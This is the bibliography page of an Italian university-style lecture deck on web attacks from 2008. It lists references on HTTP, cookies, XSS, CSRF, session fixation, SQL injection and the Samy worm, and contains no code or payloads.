Attacchi web
16 Dicembre 2008
31 / 32
Bibliografia
RFC HTTP
http: // tools. ietf. org/ html/ rfc1945 (HTTP 1.0)
http: // tools. ietf. org/ html/ rfc2616 (HTTP 1.1)
http: // tools. ietf. org/ html/ rfc2109 (HTTP State
Management Mechanism)
OWASP
XSS http: // www. owasp. org/ index. php/ XSS_ Attacks
CSRF http: // www. owasp. org/ index. php/ CSRF
Altro
http: // wp. netscape. com/ newsref/ std/ cookie_ spec. html
(Cookies)
M. Kolsek Session Fixation Vulnerability in Web-based
Applications
http: // www. acros. si/ papers/ session_ fixation. pdf
Samy virus: http: // namb. la/ popular/
A Classification of SQL Injection Attacks and Countermeasures
http: // www. cc. gatech. edu/ ~ orso/ papers/ halfond. viegas.
orso. ISSSE06. pdf
Advanced SQL Injection In SQL Server Applications
http: // www. nextgenss. com/ papers/ advanced_ sql_
injection. pdf
Roberto Paleari, Emanuele Passerini
Attacchi web
16 Dicembre 2008
32 / 32
Scarica